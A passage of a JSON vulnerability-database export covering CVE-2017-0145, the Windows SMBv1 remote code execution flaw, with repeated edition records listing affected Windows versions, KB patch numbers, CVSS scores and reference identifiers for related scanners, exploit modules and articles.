10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core 
installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", 
"kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 
Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for 
x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core 
installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": 
"2021-09-20T04:47:39", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": 
["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T06:50:12", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB3210721", "KB3205401", "KB4014077", "KB4012216", "KB4013198", "KB3213986", "KB4012214", "KB4012217", "KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB3177186", "KB4012212", "KB4012215", "KB4012598", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, 
{"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:50:12", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "4b3c58a0de4c835f521b07a7a1b9b647", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T08:45:23", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", 
